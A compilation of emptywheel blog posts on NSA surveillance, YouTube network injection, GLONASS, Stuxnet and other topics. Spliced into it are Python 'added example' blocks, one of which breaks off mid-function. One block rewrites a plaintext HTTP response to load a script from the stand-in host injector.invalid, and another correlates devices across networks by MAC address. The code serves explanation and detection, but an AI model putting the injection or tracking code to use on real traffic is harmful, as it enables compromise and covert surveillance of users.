Rayne

Treasure Map: It’s About Location, Not Gold

Der Spiegel and The Intercept published collaborative reporting this weekend on another Snowden document — this one referring to a National Security Agency program named TREASURE MAP.

The most chilling part of this reporting is a network engineer’s reaction (see here on video) when he realizes he is marked or targeted as a subject of observation. He’s assured it’s not personal, it’s about the work he does – but his reaction still telegraphs stress. An intelligence agency can get to him, has gotten to him; he’s touchable.

The truth is that almost any of us who follow national security, cyber warfare, or information technology are potential subjects depending on our work or play.

The metadata we generate is only part of the observation process; it provides information about our individual patterns of behavior, but may not actually disclose where we are.

TREASURE MAP goes further, by providing the layout of the network on which any of us are generating metadata. But there is some other component either within TREASURE MAP, or within a complementary tool, that provides the physical address of any networked electronic device.

The NSA has the ability to track individuals not only by Internet Protocol (IP) addresses but by media access control (MAC) addresses, according to a recent interview with Snowden by James Bamford in Wired. This little nugget was a throwaway; perhaps readers already assumed this capability existed, or didn’t understand the implications:

…But Snowden’s disenchantment would only grow. It was bad enough when spies were getting bankers drunk to recruit them; now he was learning about targeted killings and mass surveillance, all piped into monitors at the NSA facilities around the world. Snowden would watch as military and CIA drones silently turned people into body parts. And he would also begin to appreciate the enormous scope of the NSA’s surveillance capabilities, an ability to map the movement of everyone in a city by monitoring their MAC address, a unique identifier emitted by every cell phone, computer, and other electronic device.

[emphasis added]

In simple terms, IP addresses are like phone numbers: they are assigned. They can be static; a printer on a business network, for example, may be assigned a static address to assure it is always reachable to accept print jobs at a fixed location. IP addresses may also be dynamic; where the users on a network come and go, handing out temporary addresses works best. Think of your local coffee shop, where customers use the WiFi. When they leave the premises, their address lease expires and returns to the pool on the WiFi router, to be handed to the next customer. A MAC address, by contrast, is assigned to the network interface by its manufacturer, normally does not change when the IP lease does, and is broadcast in the clear to anything within radio range every time a WiFi device probes for a network.
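An added example, not from the original post, of why the distinction matters in practice: a MAC address can be decoded and followed from network to network, while a DHCP lease is handed to the next customer as soon as the previous one leaves. The addresses, the networks and the lease pool below are constructed for illustration (the 00:1a:2b vendor prefix is used as a hypothetical OUI); the U/L-bit test is how a software-randomised address, as later operating systems began to emit, can be told apart from a burned-in one.

```python
"""Added example (not from the original post): why a MAC address tracks a
device across networks while a DHCP-assigned IP address does not.
A small DHCP-style lease pool and a MAC inspector; all data constructed."""

from __future__ import annotations
from collections import defaultdict

# Constructed sample of what access points would log as devices associate.
# The MACs are made up; 00:1a:2b stands in for a hypothetical vendor prefix.
OBSERVATIONS = [
    ("coffee_shop", "00:1a:2b:3c:4d:5e"),
    ("coffee_shop", "00:1a:2b:3c:4d:5f"),
    ("library",     "00:1a:2b:3c:4d:5e"),   # same laptop, different network
    ("airport",     "02:7f:10:aa:bb:cc"),   # locally administered (randomised)
    ("airport",     "00:1a:2b:3c:4d:5e"),
]

def parse_mac(mac: str) -> list[int]:
    """Return the six octets of a colon- or hyphen-separated MAC address."""
    octets = [int(x, 16) for x in mac.replace("-", ":").split(":")]
    if len(octets) != 6 or not all(0 <= o <= 255 for o in octets):
        raise ValueError(f"not a MAC address: {mac!r}")
    return octets

def is_locally_administered(mac: str) -> bool:
    """Bit 0x02 of the first octet is the U/L bit: set means the address was
    assigned in software (e.g. OS-level randomisation), not burned in by the
    manufacturer, so it carries no stable vendor prefix to look up."""
    return bool(parse_mac(mac)[0] & 0x02)

def oui(mac: str) -> str:
    """First three octets: the Organizationally Unique Identifier that maps
    to a manufacturer in the IEEE registry (laptop vs. phone vs. printer)."""
    return ":".join(f"{o:02x}" for o in parse_mac(mac)[:3])

class LeasePool:
    """Minimal DHCP-like pool: lowest free address goes to the next client,
    and a released address is reused immediately, so an IP address by itself
    says nothing stable about who held it."""
    def __init__(self, network: str, size: int):
        self.free = [f"{network}.{i}" for i in range(10, 10 + size)]
        self.leases: dict[str, str] = {}   # mac -> ip

    def assign(self, mac: str) -> str:
        if mac not in self.leases:
            self.leases[mac] = self.free.pop(0)
        return self.leases[mac]

    def release(self, mac: str) -> None:
        self.free.insert(0, self.leases.pop(mac))   # next arrival gets it

def device_trail(observations) -> dict[str, list[tuple[str, str]]]:
    """Group sightings by hardware address, the key a passive observer would
    correlate on, no matter which IP each network handed out."""
    trail, pools = defaultdict(list), {}
    for net, mac in observations:
        pool = pools.setdefault(net, LeasePool("10.0.0", 8))
        trail[mac].append((net, pool.assign(mac)))
    return dict(trail)

def ip_reuse_demo() -> tuple[str, str]:
    """One customer leaves the coffee shop; the next arrival inherits the
    same IP address, so the IP alone cannot be tied to either of them."""
    pool = LeasePool("10.0.0", 8)
    first = pool.assign("00:1a:2b:3c:4d:5e")
    pool.release("00:1a:2b:3c:4d:5e")
    second = pool.assign("00:1a:2b:3c:4d:5f")
    return first, second

if __name__ == "__main__":
    for mac, sightings in device_trail(OBSERVATIONS).items():
        kind = "randomised" if is_locally_administered(mac) else f"vendor {oui(mac)}"
        print(mac, kind, sightings)
    print("IP reuse:", ip_reuse_demo())
```

The trail shows one hardware address turning up at three networks under two different IP addresses, while the two coffee-shop customers share one address in turn; only the locally administered address breaks the correlation, which is the whole point of randomising it.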

Internet Cats, Weaponized: US Defense Contractor Consulted on Targeted Network Injection Surveillance for Commercial Sales Abroad

[photo: liebeslakritze via Flickr]

First, a caveat: I would not click on the links embedded in the story I’m recommending (I’m this || close to swearing off embedded links forever). I don’t trust traffic to them not to be monitored or exploited.

But as Jeremy Scahill tweeted last evening, read this piece by WaPo’s Barton Gellman on malicious code insertion. This news explains recent changes by Google to YouTube once it had been disclosed to the company that exploits could be embedded in video content as CitizenLab.org explains:

“… the appliance exploits YouTube users by injecting malicious HTML-FLASH into the video stream. …”
“… the user (watching a cute cat video) is represented by the laptop, and YouTube is represented by the server farm full of digital cats. You can observe our attacker using a network injection appliance and subverting the beloved pastime of watching cute animal videos on YouTube. …”
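What the appliance in that description actually does is mechanically simple, and the reason it works is that the video page travels as plaintext HTTP. The following is an added example, not from the original post, from Citizen Lab or from any vendor: a constructed HTTP response, the on-path rewrite an injector performs on it, and the content-integrity check a client can apply to notice the change. The page, the response and the injector host (injector.invalid) are all made up.

```python
"""Added example (not from the original post, Citizen Lab or a vendor): the
on-path rewrite a network injection appliance performs on a cleartext HTTP
response, beside the integrity check that detects it. All data constructed."""

import base64
import hashlib
import hmac

# Constructed page body the server intends to deliver.
PAGE = b'<html><body><video src="cat.mp4"></video></body></html>'

def build_response(body: bytes, content_type: bytes = b"text/html") -> bytes:
    """Constructed plaintext HTTP/1.1 response as a server would send it."""
    return (b"HTTP/1.1 200 OK\r\n"
            b"Content-Type: " + content_type + b"\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n"
            b"\r\n" + body)

def split_response(raw: bytes):
    """Return (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

# Hypothetical injector host; real appliances point at infrastructure they run.
PAYLOAD = b'<script src="http://injector.invalid/x.js"></script>'

def inject(raw: bytes, payload: bytes = PAYLOAD) -> bytes:
    """The appliance's transform. It works only because the bytes are readable
    and rewritable in transit: over TLS the same rewrite would fail the record
    integrity check and the client would drop the connection."""
    status, headers, body = split_response(raw)
    if headers.get(b"content-type", b"").split(b";")[0].strip() != b"text/html":
        return raw                       # leave non-HTML objects untouched
    new_body = body.replace(b"</body>", payload + b"</body>", 1)
    headers[b"content-length"] = str(len(new_body)).encode()  # keep it parseable
    head = b"\r\n".join([status] + [k + b": " + v for k, v in headers.items()])
    return head + b"\r\n\r\n" + new_body

def sri_digest(content: bytes) -> str:
    """Subresource-Integrity-style digest of what the server meant to send."""
    return "sha256-" + base64.b64encode(hashlib.sha256(content).digest()).decode()

def integrity_ok(raw: bytes, expected: str) -> bool:
    """Client-side check: does the body received match the published digest?"""
    _, _, body = split_response(raw)
    return hmac.compare_digest(sri_digest(body), expected)

def demo() -> dict:
    original = build_response(PAGE)
    expected = sri_digest(PAGE)            # published out of band / in a manifest
    tampered = inject(original)
    _, hdrs, body = split_response(tampered)
    return {
        "original_passes": integrity_ok(original, expected),
        "tampered_passes": integrity_ok(tampered, expected),
        "payload_present": PAYLOAD in tampered,
        "length_consistent": int(hdrs[b"content-length"]) == len(body),
    }

if __name__ == "__main__":
    print(demo())
```

Note that the injected response is perfectly well-formed (the appliance fixes Content-Length), so nothing in the HTTP layer flags it; only a digest fixed before the bytes crossed the network, or transport encryption that makes the rewrite impossible in the first place, catches it.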

The questions this piece shakes loose are legion, but just as numerous are the holes. Why holes? Because the answers are ugly and complex enough that one might struggle with them. Gellman has done the best he can with nebulous material.

An interesting datapoint in the first graf of the story is timing — fall 2009.

You’ll recall that Google revealed the existence of a cyber attack code named Operation Aurora in January 2010, which Google said began in mid-December 2009.

You may also recall news of a large batch of cyber attacks in July of 2009 on South Korean targets.

The U.S. military had already experienced a massive uptick in cyber attacks in 1H2009, more than double the rate of the entire previous year.

And neatly sandwiched between these waves and events is a visit to Munich, Germany by an engineer from CloudShield Technologies, a California defense contractor, to consult with the British-owned Gamma Group.

Snowpiercer: Bong Joon-Ho’s Jab at the God of the Machine


(The cats are away at Netroots Nation, leaving the meese to play. — Rayne)

A number of film critics have written that Snowpiercer — director Bong Joon-Ho’s adaptation of the French dystopic graphic novel, Le Transperceneige — is a cinematic allegory of climate change (the new “cli-fi“). Others will call it an allegory of class warfare. The film was released in the U.S. on 27 June, reaching only 374 theaters across the country. Thankfully it went to video-on-demand last Friday as it entered its third week in theaters.

The highly limited and unusual method of release belies the film’s stunning appearance, its stellar cast, its punchy delivery. It’s all of these things and more: gritty, raw, gruesome, action-filled and emotion-tugging. Chris Evans was a surprise, offering restrained yet emotionally exposed work as flawed and resistant Curtis — a far cry from his recent stints as Captain America. Tilda Swinton is her funky finest, and Octavia Spencer is a powerful mother tigress. Korean actors Kang-ho Song and Ah-sung Ko fit perfectly, as do John Hurt and Jamie Bell. Effects are purposeful and not excessive, camera work highly effective, the score clings to the action like a skin.

Snowpiercer is believed to have been dissed on distribution because Bong Joon-Ho insisted on his own cut, resisting Harvey Weinstein’s demands that 20 minutes be excised. Given how closely the story reflects Dante’s Inferno, it’s difficult to see how any cuts affecting up to and through any of its gates would allow the movie to work as it does. (Really, Harvey, which of the circles of hell could we do without? Did you consult with Satan?)

But another reason for the short shrift on distribution may be the film’s unacknowledged allegory: the engine of production continues at all costs.

This is not the message of class warfare which Le Transperceneige’s two books more closely spell out. This is the ugly truth of our current global economy and the descent it makes into a catastrophic climate hell ahead.

The creators of the train ensuring your existence insist you stay where you are, even if you perceive yourself to be at the head of the train. You will be punished if you step out of your assigned place in the works. Resistance is terrorism, and must be eliminated to retain the careful balance necessary to assure production’s continuity. You have no privacy, no rights, no value save for your usefulness to the god of the machine.

This film jabs at the global economy’s bloated belly, wherein gross domestic product is worshipped, and energy’s demands obeyed at the expense of free will and a survivable planet. Bong Joon-Ho’s message is far more subtle and important than that of conflict between labor and capital. It’s certainly more unsettling to the domestic distribution system which desires a sure, non-threatening blockbuster to continue their offering of profit to the god of productivity.

Spoiler (look away now, I’ll put this after the jump):

Remotely Yours: Internet of Things Meets Father’s Day

[Graphic: Google Glass by Wilbert Baan via Flickr]

After all you father-types have finished opening your gift-wrapped nifty new cellphones and car stereo systems, wireless remote thermostats, fitness tracking watches, and Google Glasses received from your adoring spawn, you might want to set aside a little downtime for reading — perhaps on that tablet or e-reader you received for Father’s Day.

Predicting the future on the Web’s 25th anniversary*, a Pew Internet study published in March this year, reveals the depth of naivete bordering on gross ignorance on the part of so-called experts surveyed for this report.

The subhead alone should concern you:

Experts say the Internet will become ‘like electricity’ over the next decade–less visible, yet more deeply embedded in people’s lives, with many good and potentially bad results

Emphasis mine — because really, how much more deeply embedded does the internet need to become in our lives before we begin to rethink its widening application?

At the risk of sounding Ted Kaczynski-ish, we have allowed the development, implementation and integration of technology to run amok. We’ve only paid attention to the narrowest benefits we might receive from explicit application of any new technology, failing to look at the systemic repercussions of all our technology on all our society and on the planet we share.

It’s not your remote controlled light switch in itself that is a problem. Go ahead, turn on your lights at home while you’re on your summer vacation across country.

It’s the lack of thought about the entirety of the internet itself and its embedment that is a major problem. We’ve already become utterly dependent upon it. The additional little tools and toys we inanely call the “internet of things” will only make the situation more complex.

Ask yourself this: If the internet suddenly crashed this week, completely collapsed for an unspecified length of time, what would happen to the global economy?

What would happen to the health of patients in hospitals and care facilities — are there monitoring and medication-dispensing applications that are both life saving and internet mediated?

How would we conduct and record any kind of transaction, between individuals, between businesses, between governments?

Would our power grid continue to run smoothly without the use of the internet?

At a minimum we should be asking ourselves at what point our government will limit its tracking and compilation of metadata, let alone whether it can use data from one’s wireless slow cooker as a criterion to dispatch a deadly drone. Imagine the mind-boggling size of the data farm required to house all the metadata alone from the internet of things.

We should be asking what our response should be if foreign governments conduct cyber war through this internet of things: cyber-retaliation with an equal and measured response, taking out wireless rice cookers and teapots on the other side of the globe?

What happens if our cyberweapons are deployed against us, like a customized Stuxnet invisibly tweaking all the settings on all our internet of things? Would we know we’d been targeted until far too late?

Anyhow, just some food for thought, something to mull over as you flip your remotely monitored ribs on the smoker while sipping on your icy cold brew produced from your wirelessly controlled refrigerator — which may tell you soon you’re low on beer.

Happy Father’s Day!

* h/t @sarahkendzior

[UPDATED] Russian GPS-Alternative Satellites Went ‘Illegal/Failure’: Solar Storm Damage or Cyberwar in Space?

[Image: GLONASS monitoring status board, 2 April 2014, 14:07]

[Update at end of article. Rayne 6:45 pm EST]

Between 1030 and 0400 UTC last night or early morning, most of Russia’s GLONASS satellites reported “illegal” or “failure” status. As of this post, they do not appear to be back online.

GLONASS is the equivalent of GPS, an alternative global navigation satellite system (GNSS) launched and operated by Russian Aerospace Defense Forces (RADF). Apart from GPS, it is the only other GNSS with global capability.

It’s possible that the outage is related either to a new M-class solar storm — the start of which was reported about 48 hours ago — or to the recent X-class solar flare on March 29 at approximately 1700 UTC. The latter event caused a short-term radio blackout about one hour after the flare erupted.

But there is conjecture that GLONASS’ outage is human in origin and possibly deliberate. The absence of any reported outage news regarding GPS and other active satellite systems suggests this is quite possible, given the unlikelihood that technology used in GLONASS differs dramatically from that used in other satellite systems.

At least one observer mentioned that a monitoring system tripped at 21:00 UTC — 00:00 GLONASS system time. The odds of a natural event like a solar storm tripping at exactly top of the hour are ridiculously slim, especially since radiation ejected from the new M-class storm may not reach its peak effect on earth for another 24-48 hours.

[Image: GLONASS monitoring status board, 2 April 2014]

It’s not clear whether the new GLONASS-M satellite launched March 24th may factor into this situation. There are no English language reports indicating the new satellite was anything but successful upon its release, making it unlikely its integration into the GLONASS network caused today’s outage.

If the outage is based in human activity, the problem may have been caused by:

— an accidental disabling here on earth, though RADF most likely has redundancies to prevent such a large outage;

— deliberate tampering here on earth, though with RADF as operator this seems quite unlikely; or

— deliberate tampering in space, either through scripts sent from earth, or technology installed with inherent flaws.

The last is most likely, and of either scripts sent from earth or the flawed technology scenarios, the former is more likely to cause a widespread outage.

However, if many or all the core operating systems on board the GLONASS satellites had been updated within the last four years – after the discovery of Stuxnet in the wild – it’s not impossible that both hardware and software were compromised with an infection. Nor is it impossible that the same infection was triggered into aggressive action from earth.

Which raises the question: are we in the middle of a cyberwar in space?

UPDATE — 6:45 PM EST—

Sources report the GLONASS satellite network was back online noon-ish Russian time (UTC+4); the outage lasted approximately 11 hours. Unnamed source(s) said the outage was due to the upload of bad ephemeris data: the orbital parameters each satellite broadcasts so that receivers on the ground can compute where that satellite is, and from that their own position. Corrupt ephemeris does not harm the satellite itself, but it makes its signal unusable for navigation until a correct set is uploaded. An alleged system-wide update with bad data suggests RADF has serious problems with change management, though.
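The change-management control that would have stopped a constellation-wide bad upload is a pre-flight sanity check on the ephemeris batch. The following is an added example, not from the original post and not anyone’s real upload tooling: it validates a batch of constructed GLONASS-style records (Earth-fixed position in km and velocity in km/s, as the system broadcasts) against the orbit the satellites are known to fly. The nominal radius, the tolerances and the three sample records are the author’s assumptions for illustration.

```python
"""Added example (not from the original post, and not RADF's or anyone's real
upload tooling): a sanity gate for GLONASS-style broadcast ephemeris records
before they are uploaded to the constellation. Records are constructed."""

import math

# GLONASS broadcasts each satellite's own Earth-fixed position and velocity
# (km, km/s). The orbit is near-circular at roughly 19,100 km altitude, so a
# healthy record must sit close to these figures. Tolerances are assumptions.
GM_KM3_S2 = 398600.4418        # Earth's gravitational parameter
NOMINAL_RADIUS_KM = 25508.0    # 6378 km Earth radius + 19130 km altitude
RADIUS_TOL_KM = 300.0
SPEED_TOL_KM_S = 0.10
MAX_RADIAL_SPEED_KM_S = 0.10   # near-circular orbit: r.v/|r| should be ~0

def _norm(vec) -> float:
    return math.sqrt(sum(c * c for c in vec))

def validate_ephemeris(rec: dict) -> list:
    """Return a list of findings; an empty list means the record passes."""
    findings = []
    r, v = rec["pos_km"], rec["vel_km_s"]
    radius, speed = _norm(r), _norm(v)
    expected_speed = math.sqrt(GM_KM3_S2 / NOMINAL_RADIUS_KM)   # circular-orbit speed
    if abs(radius - NOMINAL_RADIUS_KM) > RADIUS_TOL_KM:
        findings.append(f"radius {radius:.0f} km outside nominal orbit")
    if abs(speed - expected_speed) > SPEED_TOL_KM_S:
        findings.append(f"speed {speed:.3f} km/s inconsistent with orbit")
    if radius > 0:
        radial = sum(a * b for a, b in zip(r, v)) / radius
        if abs(radial) > MAX_RADIAL_SPEED_KM_S:
            findings.append(f"radial velocity {radial:.3f} km/s, not near-circular")
    return findings

def gate_upload(records: list) -> tuple:
    """Split a batch into accepted records and a {slot: findings} map of
    rejections. A slot repeated within one batch is rejected as well."""
    accepted, rejected, seen = [], {}, set()
    for rec in records:
        findings = validate_ephemeris(rec)
        if rec["slot"] in seen:
            findings.append("duplicate slot in batch")
        seen.add(rec["slot"])
        if findings:
            rejected[rec["slot"]] = findings
        else:
            accepted.append(rec)
    return accepted, rejected

# Constructed batch: a healthy record; one with position in metres instead of
# kilometres (a unit slip); and one whose velocity points straight outward.
SAMPLE_BATCH = [
    {"slot": 1, "pos_km": (25508.0, 0.0, 0.0), "vel_km_s": (0.0, 1.683, 3.577)},
    {"slot": 2, "pos_km": (25508000.0, 0.0, 0.0), "vel_km_s": (0.0, 1.683, 3.577)},
    {"slot": 3, "pos_km": (0.0, 25508.0, 0.0), "vel_km_s": (0.0, 3.953, 0.0)},
]

if __name__ == "__main__":
    ok, bad = gate_upload(SAMPLE_BATCH)
    print(f"accepted {len(ok)} record(s); rejected: {bad}")
```

Any single rejection should hold the whole batch, since a partial upload leaves the constellation in a mixed state; the physics check is cheap, and it is exactly the kind of gate that a unit slip or a wrong-sign error walks straight through when the only control is an operator’s confirmation prompt.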

There is speculation the M-class solar storm, summarized at 1452 UTC as an “X-ray Event exceeded M5,” may have impacted GLONASS. However early feedback about radiation ejected by an M-class storm indicated the effects would not reach earth for 24-48 hours after the storm’s eruption.

Minority Report on Ukraine, or What’s Venezuela Got to Do with It?

I freely admit to being the oddest of the quadruplets in the Emptywheel sensory deprivation pool, producing the quirky minority report from time to time.

Which may explain the following graphic with regard to current geopolitical tensions.

[Source: Google Trends and Google Finance]

As you can see, not every trending burp in the news about either Venezuela or Ukraine produced a corresponding bump in the fossil fuel market. Some trend-inducing news may have nothing at all to do with energy. It’s quite possible I may not have captured other key businesses, as some of them don’t trade publicly, or don’t trade in a manner readily captured by Google Finance.

But there are a few interesting relationships between news and price spikes, enough to make one wonder what other values may spike with increased volatility in places like Venezuela (which has the largest oil and natural gas reserves in the western hemisphere), and Ukraine (which lies between the EU and the largest natural gas deposits in the world, and the world’s eighth largest oil reserves).

Of course there’s an additional link between these two disparate countries. Both of them have already seen similar upheavals in which the U.S. played a role — Ukraine’s 2004 Orange Revolution, and the 2002 attempted coup in Venezuela.

When someone made noise about an Afghan Muslim being a key locus of the latest unrest in Ukraine, I couldn’t help but think of the Trans-Afghanistan Pipeline for natural gas which has yet to be realized, primarily for a lack of adequate political will among nation-states with a vested interest in its success.

It also made me think of news reports from this past summer when Turkmenistan, sitting on the fourth largest natural gas reserves in the world, expressed a readiness to export gas to Europe. This would cut into Russia’s sales, but not for a few years, requiring continuation of existing relationships for the next three to five years. Note the pipelines, existing and planned on the following U.S. State Department map (date unclear, believed to be post-2006).*

GM’s New CEO: This Model Has Titanium Features

[Photo: Mary Barra, CEO, General Motors]

The woman in the photo has big titanium ovaries — not malleable brass or rusting iron. Do I know Mary Barra personally to attest to this fact? No. But I have a pretty damned good idea where GM’s new CEO has been, and it takes a pretty tough set of specifications to survive the road she’s traveled.

Like her I grew up in the I-75 corridor in Michigan, where much of the automotive industry’s OEM facilities and Tiers 1 through 3 suppliers could be found. Like her father, my father worked in the automotive business; if her household was like mine, there were copies of Car and Driver, Road & Track, machinist, tool-and-die, and metalforming magazines cluttering coffee tables or in dad’s man-cave. The smell of machine oil and the grit of metal chips are familiar, as are an ever-present collection of safety glasses, hearing protection, and greasy jumpsuits. Picture a garage like that in Clint Eastwood’s movie Gran Torino; I’ll lay good money her dad probably spent a lot of his free time between shifts in a home shop like that, and where she might have been found as well if he needed a hand or she needed a tool to fix something.

It was in her blood, I’m sure; I’ll bet she could taste it. I’m pretty certain this is why she went into engineering, and likely why she went to that particular private engineering school.

After working for a couple years as a high school engineering co-op student I had been accepted at the same school, but I went a different road, preferring business and then-nascent computing technology over engineering. My daughter, though, is at that school now. She could taste it, too; we have pictures of her at age nine, wearing safety glasses, proudly holding her first aluminum machined part. She’s the first person her dad asks for help when working on the cars at home.

I wish now I’d taken pictures of her the time she was so damned mad at her brother and his friend for accidentally breaking the sibling-shared PlayStation 2 console. She ripped it down, diagnosed it using internet research, fixed and reassembled it on her own in an afternoon.

Driven to identify and solve the problem — that’s what it takes to choose engineering as a career, particularly if you are a woman.

Sure, men too must be driven to pursue the same field, but they don’t face the hurdles that women faced then or even now, 30 years after General Motors’ new CEO first started college at the former General Motors Institute. Nobody ever questions a boy’s right to pursue engineering, or a man’s right to practice that discipline. Nobody ever questions the gender of a man with an engineering degree when he makes it to the pinnacle of the corporate ladder.

BBC’s Adam Curtis’ Fluck Up

Every once in a while there’s an opinion piece so grossly naive, horribly uninformed, or passively apologetic that it deserves pushback.

BBC’s Adam Curtis’ blog post, WHAT THE FLUCK [sic], is such a piece. Read it for yourself. I’m still scratching my head about this overlong, winding post that ultimately says,

“…Maybe today we are being farmed by the new system of power. But we can’t see quite how it is happening – and we need a new journalism to explain what is really going on. …”

No. We have the right journalism, even if it is not perfect or dispersed evenly, even if we could use more of it. The Guardian’s work on the Snowden story is just one example; if I may say so, Emptywheel sets another fine example as citizen journalism.

What we need is a public willing to invest time and energy in reading the material reported, discuss it openly after careful analysis, willing to demand and support more good journalism by way of subscription, donation, or advertising revenues as a last resort.

What we don’t need are naive or uninformed opinion leaders who tell us we don’t have journalism reporting about the size, scale, and nature of the corruption we face.

What we don’t need are apologias masquerading as demands for more and better journalism.

Curtis’ piece in particular does several things to muddy the public’s perception about journalism today:

• He throws us a narrative about poor little rich girl Tamara Yeardye Mellon and her father that is not unlike reading about poor little Paris Hilton, or poor little Kardashian Annoying-Sister-Of-The-Day. The narrative utterly misses a critical point, derailing its own effort, yet he feels the public needs more backstory narrative in order to really understand today’s challenges.

• Rupert Murdoch is treated as if he was handed a bag of flaming dog poo by his editorial predecessor, dealing with the mess in the best manner he could — as if cellphone hacking by Murdoch’s employees was mere fallout inherited immaculately by Murdoch.

• Curtis ignores his own role, using his bully pulpit to complain about an absence of reporting he is capable of providing instead of this meandering whinge.

With regard to Tamara Mellon’s allegedly losing control of her luxe shoe business, Jimmy Choo Limited, to Phoenix Private Equity, Curtis failed to note that not even a Mellon family member is safe from predation. Even a Mellon can be made into a corporate vulture’s bitch.

What does this tell us about the nature of the beast?

Information Monopoly Defines the Deep State

[Photo: Monopoly by rutty via Flickr]

The last decade witnessed the rise of the deep state — an entity not clearly delineated that ultimately controls the military-industrial complex, establishing its own operational policy and practice outside the view of the public in order to maintain its control.

Citizens believe that the state is what they see, the evidence of their government at work. It’s the physical presence of their elected representatives, the functions of the executive office, the infrastructure that supports both the electoral process and the resulting machinery serving the public at the other end of the sausage factory of democracy. We the people put fodder in, we get altered fodder out — it looks like a democracy.

But deep state is not readily visible; it’s not elected, it persists beyond any elected official’s term of office. While a case could be made for other origins, it appears to be born of intelligence and security efforts organized under the Eisenhower administration in response to new global conditions after World War II. Its function may originally have been to sustain the United States of America through any threat or catastrophe, to insure the country’s continued existence.

Yet the deep state and its aims may no longer be in sync with the United States as the people believe their country to be — a democratic society. The democratically elected government does not appear to have control over its security apparatus. This machinery answers instead to the unseen deep state and serves its goals.

As citizens we believe the Department of State and the Department of Defense, along with all their subset functions, exist to conduct peaceful relations with other nation-states while protecting our own nation-state in the process. Activities like espionage for discreet intelligence gathering are as important as diplomatic negotiations to these ends. The legitimate use of military force is in the monopolistic control of both the Departments of State and Defense, which according to philosopher Max Weber is what defines the existence of a state.

The existing security apparatus, though, does not appear to function in this fashion. It refuses to answer questions put to it by our elected representatives when it doesn’t lie to them outright. It manages and manipulates the conditions under which it operates through implicit threats. The legitimacy of the military force it wields is questionable because it cannot be restrained by the country’s democratic processes and may subvert control over military functions.

Further, it appears to answer to some other entity altogether. Why does the security apparatus pursue the collection of all information, in spite of such activities disrupting the ability of both State and Defense Departments to operate effectively? Why does it take both individuals’ and businesses’ communications while breaching their systems, in direct contravention to the Constitution’s Fourth Amendment prohibition against illegal search and seizure?

Stuxnet and the Poisons that Open Your Eyes

[Image: poison pictogram via Wikipedia, modified]

Playwright August Strindberg wrote, “…There are poisons that blind you, and poisons that open your eyes.”

We’ve been blinded for decades by complacency and stupidity, as well as our trust. Most Americans still naively believe that our government acts responsibly and effectively as a whole (though not necessarily its individual parts).

By effectively, I mean Americans believed their government would not deliberately launch a military attack that could affect civilians — including Americans — as collateral damage. Such a toll would be minimized substantially. Yesterday’s celebration related to the P5+1 interim agreement regarding Iran’s nuclear development program will lull most Americans into deeper complacency. The existing system worked, right?

But U.S. cyber warfare to date proves otherwise. The government has chosen to deliberately poison the digital waters so that all are contaminated, far beyond the intended initial target.

There’s very little chance of escaping the poison, either. The ubiquity of U.S. standards in hardware and software technology has ensured this. The entire framework — the stack of computing and communications from network to user applications — has been affected.

• Network: Communications pathways have been tapped, either to obtain specific content, or obtain a mirror copy of all content traveling through it. It matters not whether telecom network, or internal enterprise networks.

• Security Layer: Gatekeeping encryption has been undermined by backdoors and weakened standards, as have the security certificates that validate the handshake between systems.

• Operating Systems: Backdoors have been obtained, knowingly or unknowingly on the part of OS developers, using vulnerabilities and design flaws. Not even Linux can be trusted at this point (Linux progenitor Linus Torvalds has not been smart enough to offer a dead man’s switch notification.)

• User Applications: Malware has embedded itself in applications, knowingly or unknowingly on the part of app developers.

End-to-end, top-to-bottom and back again, everything digital has been touched in one layer of the framework or another, under the guise of defending us against terrorism and cyber warfare.

Further, the government watchdogs entrusted to prevent or repair damage have become part and parcel of the problem, in such a way that they cannot effectively be seen to defend the public’s interests, whether those of individual citizens or corporations. The National Institute of Standards and Technology has overseen the establishment and implementation of weak encryption standards for example; it has also taken testimony [PDF] from computing and communications framework hardware and software providers, in essence hearing where the continued weak spots will be for future compromise.

The fox is watching the hen house, in other words, asking for testimony pointing out the weakest patches installed on the hen house door.

The dispersion of cyber poison was restricted only in the most cursory fashion.

Stuxnet’s key target appears to have been Iran’s Natanz enrichment facility, specifically the Siemens industrial control (SCADA/PLC) equipment driving its centrifuges, but it spread far beyond it and into the private sector, as Chevron disclosed. The only thing that limited the damage was the specificity of its trigger: the sabotage payload fired only on systems running particular Siemens PLC configurations, leaving every other infected machine carrying the malware but inert. It’s still out there.

Duqu, a “sibling” cyber weapon sharing code with Stuxnet, had two-fold aims: its loader could deliver an attack payload, but what it was actually observed delivering was espionage capability (keystroke logging and document theft), and it turned up in a much smaller set of targeted infections than Stuxnet.

• Ditto for Flame, yet another “sibling” cyber weapon, likewise intended for widespread distribution, with attack payload and espionage capability.

There could be more than these, waiting yet to be discovered.

In the case of both Duqu and Flame, there is a command-and-control network of servers still in operation, still communicating with instances of these two malware cyber weapons. The servers’ locations are global — yet another indicator of the planners’/developers’ intention that these weapons be dispersed widely.
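An infection that is still talking to its command-and-control servers is also the one thing a defender can see from the network. The following is an added example, not from the original post, of the standard check: read outbound connection records and flag source/destination pairs that connect on a machine-regular schedule. The proxy log lines are constructed (documentation address ranges), and the threshold of five connections with under 10% timing variation is an assumption chosen for the sample.

```python
"""Added example (not from the original post): spotting malware that is still
checking in with its command-and-control servers by finding machine-regular
outbound connections in a proxy log. Log lines are constructed and use
documentation address ranges."""

from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log, one line per connection: "date time src dst dport".
# 10.1.1.5 checks in with 203.0.113.7 every ten minutes (a beacon);
# 10.1.1.9's connections to 198.51.100.20 are a person's irregular browsing.
SAMPLE_LOG = """\
2014-10-20 10:00:00 10.1.1.5 203.0.113.7 443
2014-10-20 10:00:12 10.1.1.9 198.51.100.20 80
2014-10-20 10:00:47 10.1.1.9 198.51.100.20 80
2014-10-20 10:07:12 10.1.1.9 198.51.100.20 443
2014-10-20 10:10:00 10.1.1.5 203.0.113.7 443
2014-10-20 10:19:58 10.1.1.5 203.0.113.7 443
2014-10-20 10:23:40 10.1.1.9 198.51.100.20 80
2014-10-20 10:30:01 10.1.1.5 203.0.113.7 443
2014-10-20 10:30:01 10.1.1.9 198.51.100.20 80
2014-10-20 10:39:59 10.1.1.5 203.0.113.7 443
2014-10-20 10:50:00 10.1.1.5 203.0.113.7 443
2014-10-20 11:05:30 10.1.1.9 198.51.100.20 443
"""

def parse_log(text: str) -> list:
    """Return (timestamp, src, dst) tuples; the port is not needed here."""
    events = []
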